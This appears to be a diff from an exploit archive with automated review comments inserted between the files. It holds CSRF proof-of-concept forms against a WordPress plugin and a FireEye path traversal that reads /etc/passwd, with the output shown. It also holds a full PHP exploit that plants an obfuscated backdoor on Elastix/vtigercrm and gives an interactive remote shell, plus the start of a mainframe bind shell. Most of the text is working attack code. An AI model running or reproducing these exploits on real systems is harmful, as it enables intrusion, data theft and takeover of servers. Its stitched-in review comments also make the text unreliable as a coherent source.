<input type="hidden" name="styles&#91;144&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;145&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;146&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;147&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;148&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;149&#93;" value="normal" />
<input type="hidden" name="styles&#91;150&#93;" value="normal" />
<input type="hidden" name="styles&#91;151&#93;" value="none" />
<input type="hidden" name="styles&#91;152&#93;" value="inherit" />
<input type="hidden" name="styles&#91;153&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;154&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;155&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;156&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;157&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;158&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;159&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;160&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;161&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;162&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;163&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;164&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;165&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;166&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;167&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;513&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;176&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;177&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;178&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;179&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;180&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;181&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;182&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;183&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;184&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;185&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;186&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;187&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;188&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;189&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;171&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;514&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;172&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;173&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;174&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;175&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;169&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;521&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;522&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;170&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;523&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;535&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;536&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;537&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;538&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;539&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;540&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;541&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;542&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;543&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;544&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;545&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;546&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;547&#93;" value="solid" />
<input type="hidden" name="styles&#91;548&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;549&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;550&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;551&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;524&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;525&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;526&#93;" value="normal" />
<input type="hidden" name="styles&#91;527&#93;" value="normal" />
<input type="hidden" name="styles&#91;528&#93;" value="none" />
<input type="hidden" name="styles&#91;529&#93;" value="inherit" />
<input type="hidden" name="styles&#91;530&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;531&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;532&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;533&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;534&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;91&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;50&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;212&#93;" value="left" />
<input type="hidden" name="styles&#91;92&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;93&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;209&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;100&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;101&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;127&#93;" value="solid" />
<input type="hidden" name="styles&#91;102&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;103&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;104&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;105&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;94&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;95&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;96&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;97&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;98&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;99&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;106&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;107&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;108&#93;" value="normal" />
<input type="hidden" name="styles&#91;109&#93;" value="normal" />
<input type="hidden" name="styles&#91;110&#93;" value="none" />
<input type="hidden" name="styles&#91;112&#93;" value="inherit" />
<input type="hidden" name="styles&#91;515&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;113&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;114&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;115&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;116&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;51&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;52&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;124&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;516&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;125&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;126&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;117&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;118&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;119&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;120&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;121&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;122&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;552&#93;" value="1" />
<input type="hidden" name="styles&#91;553&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;554&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;555&#93;" value="normal" />
<input type="hidden" name="styles&#91;556&#93;" value="normal" />
<input type="hidden" name="styles&#91;596&#93;" value="none" />
<input type="hidden" name="styles&#91;590&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;591&#93;" value="solid" />
<input type="hidden" name="styles&#91;592&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;558&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;559&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;560&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;561&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;563&#93;" value="1" />
<input type="hidden" name="styles&#91;562&#93;" value="1" />
<input type="hidden" name="styles&#91;597&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;598&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;564&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;565&#93;" value="normal" />
<input type="hidden" name="styles&#91;566&#93;" value="normal" />
<input type="hidden" name="styles&#91;594&#93;" value="none" />
<input type="hidden" name="styles&#91;567&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;568&#93;" value="solid" />
<input type="hidden" name="styles&#91;569&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;570&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;571&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;572&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;573&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;574&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;595&#93;" value="none" />
<input type="hidden" name="styles&#91;575&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;576&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;577&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;578&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;579&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;580&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;581&#93;" value="normal" />
<input type="hidden" name="styles&#91;582&#93;" value="normal" />
<input type="hidden" name="styles&#91;593&#93;" value="none" />
<input type="hidden" name="styles&#91;583&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;584&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;585&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;586&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;599&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;628&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="2" /> <!-- template id to edit -->
<input type="submit" value="Click me for update template" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (delete) Cross-site Request Forgery (CSRF) issues
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
==============
Description
==============
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin,
making the victim administrator user deletes a form (PoC # 1), delete a form element (PoC # 2), or delete an existing template (PoC # 3).
-->
<!--
===============================
delete a form [CSRF PoC #1]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms" method="POST">
<input type="hidden" name="filter&#95;state" value="2" />
<input type="hidden" name="filter&#95;search" value="" />
<!-- form id value.. -->
<input type="hidden" name="ids&#91;&#93;" value="2" />
<!-- end -->
<input type="hidden" name="task" value="delete" />
<input type="submit" value="Delete form(s)" />
</form>
</body>
<!--
===============================
delete a field [CSRF PoC #2]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_fields" method="POST">
<input type="hidden" name="filter&#95;form" value="3" />
<input type="hidden" name="filter&#95;state" value="2" />
<input type="hidden" name="filter&#95;type" value="0" />
<input type="hidden" name="filter&#95;search" value="" />
<!-- fields ids to delete -->
<input type="hidden" name="ids&#91;&#93;" value="9" />
<input type="hidden" name="ids&#91;&#93;" value="10" />
<!-- end list -->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids&#91;&#93;" value="" />
<input type="submit" value="delete field(s)" />
</form>
</body>
<!--
==================================
delete a template [CSRF PoC #3]
==================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_templates" method="POST">
<input type="hidden" name="filter&#95;state" value="2" />
<input type="hidden" name="filter&#95;search" value="" />
<!-- an existing template id(s) to delete -->
<input type="hidden" name="ids&#91;&#93;" value="1" />
<!--end-->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids&#91;&#93;" value="" />
<input type="submit" value="Delete template(s)" />
</form>
</body>
<!---
===========
TIME-LINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
->
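Review bot: the TIME-LINE comment at the end of the file is malformed: it opens with `<!---` and ends with `->`, so the comment is never terminated (the close must be `-->`) and the `<html>` element opened above is never closed with `</html>`; browsers tolerate both, but a PoC file should be valid markup. The same file also places several `<body>` elements in one document (one per PoC), which is invalid HTML; either give each PoC its own file or put all forms in one body. In PoC #2 and #3 a trailing `<input type="hidden" name="ids&#91;&#93;" value="" />` sends an empty id after `task=delete`; it adds nothing and should be removed or its purpose explained. As documentation, none of the submitted forms carries a `_wpnonce` field, which is what makes the CSRF claim credible; the fix on the plugin side is `wp_nonce_field()` in the form and `check_admin_referer()` in the `admin.php?page=cfg_*` handlers, and the timeline should say whether the vendor responded to the 2015-09-04 report.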

platforms/php/webapps/38090.txt Executable file
@@ -0,0 +1,52 @@
Just one of many handfuls of FireEye / Mandiant 0day. Been sitting on this for more than 18 months with no fix from those security "experts" at FireEye. Pretty sure Mandiant staff coded this and other bugs into the products. Even more sad, FireEye has no external security researcher reporting process.
FireEye appliance, unauthorized remote root file system access. Oh cool, web server runs as root! Now that's excellent security from a _security_ vendor :) Why would you trust these people to have this device on your network?!?!?
https://fireeyeapp/script/NEI_ModuleDispatch.php?module=NEI_AdvancedConfig&function=HapiGetFileContents&name=../../../../../../../../../../../etc/passwd&extension=&category=operating%20system%20logs&mode=download&time=...&mytoken=...
...
root:aaaaa:16209:0:99999:7:::
bin:*:15628:0:99999:7:::
daemon:*:15628:0:99999:7:::
adm:*:15628:0:99999:7:::
lp:*:15628:0:99999:7:::
sync:*:15628:0:99999:7:::
shutdown:*:15628:0:99999:7:::
halt:*:15628:0:99999:7:::
mail:*:15628:0:99999:7:::
uucp:*:15628:0:99999:7:::
operator:*:15628:0:99999:7:::
games:*:15628:0:99999:7:::
gopher:*:15628:0:99999:7:::
ftp:*:15628:0:99999:7:::
nobody:*:15628:0:99999:7:::
vcsa:!!:16209::::::
rpc:!!:16209:0:99999:7:::
saslauth:!!:16209::::::
postfix:!!:16209::::::
rpcuser:!!:16209::::::
nfsnobody:!!:16209::::::
apache:!!:16209::::::
ntp:!!:16209::::::
lighttpd:!!:16209::::::
sshd:!!:16209::::::
mailnull:!!:16209::::::
smmsp:!!:16209::::::
openvpn:!!:16209::::::
tcpdump:!!:16209::::::
applianceuser:<redacted>:16209:0:99999:7:::
rproxy:aaaaa:16209:0:99999:7:::
sfserver:aaaaa:16209:0:99999:7:::
provisioning:aaaaa:16209:0:99999:7:::
upgrayedd:aaaaa:16209:0:99999:7:::
sftasker:aaaaa:16209:0:99999:7:::
felistener:aaaaa:16209:0:99999:7:::
lighthouse:aaaaa:16209:0:99999:7:::
crlfactory:aaaaa:16209:0:99999:7:::
panlistener:aaaaa:16209:0:99999:7:::
fireeye:<redacted>:16209:0:99999:7:::
--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen
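Review bot: the evidence shown does not support the "web server runs as root" claim in the second paragraph: `/etc/passwd` is world-readable on any Linux system, so retrieving it through `HapiGetFileContents` with a traversing `name=` demonstrates an unauthenticated-or-not path traversal read but says nothing about the privilege of the serving process; either state what established root or drop the claim. The request line also carries `time=...` and `mytoken=...` with the values elided and never says whether `mytoken` has to be a valid session value, so the "Unauthorized" in the title cannot be checked against the text; record the authentication state the request was sent in. Missing documentation: no product line, appliance version or build, and no fix status, despite the "18 months" statement. Style: the `aaaaa` hash fields for `root`, `rproxy`, `sfserver` and the others should be marked the same way as the `<redacted>` entries so readers do not mistake them for real data.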

platforms/php/webapps/38091.php Executable file
@@ -0,0 +1,95 @@
<?
echo "\n+-------------------------------------------+\n";
echo "| Elastix <= 2.4 |\n";
echo "| PHP Code Injection Exploit |\n";
echo "| By i-Hmx |\n";
echo "| sec4ever.com |\n";
echo "| n0p1337@gmail.com |\n";
echo "+-------------------------------------------+\n";
echo "\n| Enter Target [https://ip] # ";
$target=trim(fgets(STDIN));
$inj='<?eval(base64_decode("JGY9Zm9wZW4oJ2ZhcnNhd3kucGhwJywndysnKTskZGF0YT0nPD8gaWYoISRfUE9TVFtwd2RdKXtleGl0KCk7fSBlY2hvICJGYXJpcyBvbiB0aGUgbWljIDpEPGJyPi0tLS0tLS0tLS0tLS0tLS0tIjtAZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtmYV0pKTtlY2hvICItLS0tLS0tLS0tLS0tLS0tLSI7ID8+Jztmd3JpdGUoJGYsJGRhdGEpO2VjaG8gImRvbmUiOwo="));
?>';
$faf=fopen("fa.txt","w+");
fwrite($faf,$inj);
fclose($faf);
$myf='fa.txt';
$url =
$target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../modules/Import/ImportStep2.php%00";
// URL
$reffer = "http://1337s.cc/index.php";
$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4)
Gecko/20030624 Netscape/7.1 (ax)";
$cookie_file_path = "/";
echo "| Injecting 1st payload\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,array("userfile"=>"@".realpath($myf)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, $reffer);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$result = curl_exec($ch);
curl_close($ch);
//echo $result;
echo "| Injecting 2nd payload\n";
function faget($url,$post){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
curl_setopt($curl, CURLOPT_HEADER, true);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
function kastr($string, $start, $end){
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
$me=faget($target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00","");
echo "| Testing total payload\n";
$total=faget($target."/vtigercrm/farsawy.php","pwd=1337");
if(!eregi("Faris on the mic :D",$total))
{
die("[+] Exploitation Failed\n");
}
echo "| Sending CMD test package\n";
$cmd=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");
if(!eregi("farsawy",$cmd))
{
echo " + Cmd couldn't executed but we can evaluate php code\n + use :
$target//vtigercrm/fa.php\n Post : fa=base64code\n";
}
echo "| sec4ever shell online ;)\n\n";
$host=str_replace('https://','',$target);
while(1){
echo "i-Hmx@$host# ";
$c=trim(fgets(STDIN));
if($c=='exit'){die("[+] Terminating\n");}
$payload=base64_encode("passthru('$c');");
$fuck=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=$payload");
$done=kastr($fuck,"-----------------","-----------------");
echo "$done\n";
}
/*
I dont even remember when i exploited this shit!
maybe on 2013?!
whatever , Hope its not sold as 0day in the near future xDD
*/
?>
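Review bot: the fallback message in the `Cmd couldn't executed` branch points the user at `$target//vtigercrm/fa.php` (double slash, and a file this script never creates) while every request in the code targets `farsawy.php`; the two must agree. `$me`, the result of the second `faget()` call under `Injecting 2nd payload`, is never inspected, so there is no success check before `Testing total payload`; test it or comment why it is ignored. Portability: the file opens with the `<?` short tag and uses `eregi()`, which has been deprecated since PHP 5.3 and removed in PHP 7.0, so the script fails on any current interpreter; `<?php` and `preg_match()` with the `i` modifier are the supported forms. `CURLOPT_COOKIEFILE` and `CURLOPT_COOKIEJAR` are set to `/`, a directory, so the cookie jar is never written and the two copies of that setup (`$cookie_file_path` and the literals in `faget()`) are dead configuration. Documentation: the exploit-db header fields (Date, Vendor, Tested on, Version) are absent; the only dating is the closing `maybe on 2013?!` comment, and the title's `Elastix <= 2.4` should be tied to the vtigercrm component version actually tested.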

@@ -1,584 +1,158 @@
TITLE 'bind shell for mainframe/system Z'
BINDSH CSECT
BINDSH AMODE 31
BINDSH RMODE ANY
***********************************************************************
* *
* @SETUP registers and save areas *
* *
***********************************************************************
@SETUP DS 0F # full word boundary
STM 14,12,12(13) # save our registers
LARL 15,@SETUP # base address into R15
LR 8,15 # copy R15 to R8
USING @SETUP,8 # R8 for addressability throughout
LARL 11,SAVEAREA # sa address
ST 13,4(,11) # save callers save area
LR 13,11 # R13 to our save area
DS 0H # halfword boundaries
***********************************************************************
* *
* @LOADFS - load all the functions we need *
* for SC loop this *
* *
***********************************************************************
@LOADFS L 2,FFUNC # first function we use
LHI 3,8 # used for our index
L 4,NUMFUNC # number of functions to load
@LDLOOP LR 0,2 # load string of func name
XR 1,1 # clear R1
SVC 8 # perform LOAD
XC 0(8,2),0(2) # clear current Func space
ST 0,0(0,2) # store addr in func space
AR 2,3 # increment R2 by 8
AHI 4,-1 # decrement R4
CIB 4,0,2,@LDLOOP # compare R4 with 0,if GT loop
***********************************************************************
* *
* Create pipes to be used to communicate with child proc *
* that will be created in upcoming forking *
* *
***********************************************************************
@CPIPES LARL 14,@CFD
BRC 15,LPIPE # get FDs for child proc
@CFD ST 5,CFDR # store child read fd
ST 6,CFDW # store child write fd
@CPIPE2 LARL 14,@PFD
BRC 15,LPIPE # get FDs for parent proc
@PFD ST 5,PFDR # store parent read fd
ST 6,PFDW # store parent write fd
***********************************************************************
* *
* BP1FRK (FORK) fork a child process *
* *
***********************************************************************
LFORK L 15,BFRK # load func addr to 15
CALL (15),(CPROCN,RTN_COD,RSN_COD),VL
BRAS 0,@PREPCHL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,1 # load 1 for RC / Debugging
L 6,CPROCN # locad Ret val in R6
CIB 6,-1,8,EXITP # compare R6 to -1 and jump if eq
****************************************************
* prepare the child process for exec , only runs *
* if CPROCN (child pid from fork) equals 0 *
****************************************************
@PREPCHL L 2,CPROCN # load child proc # to R2
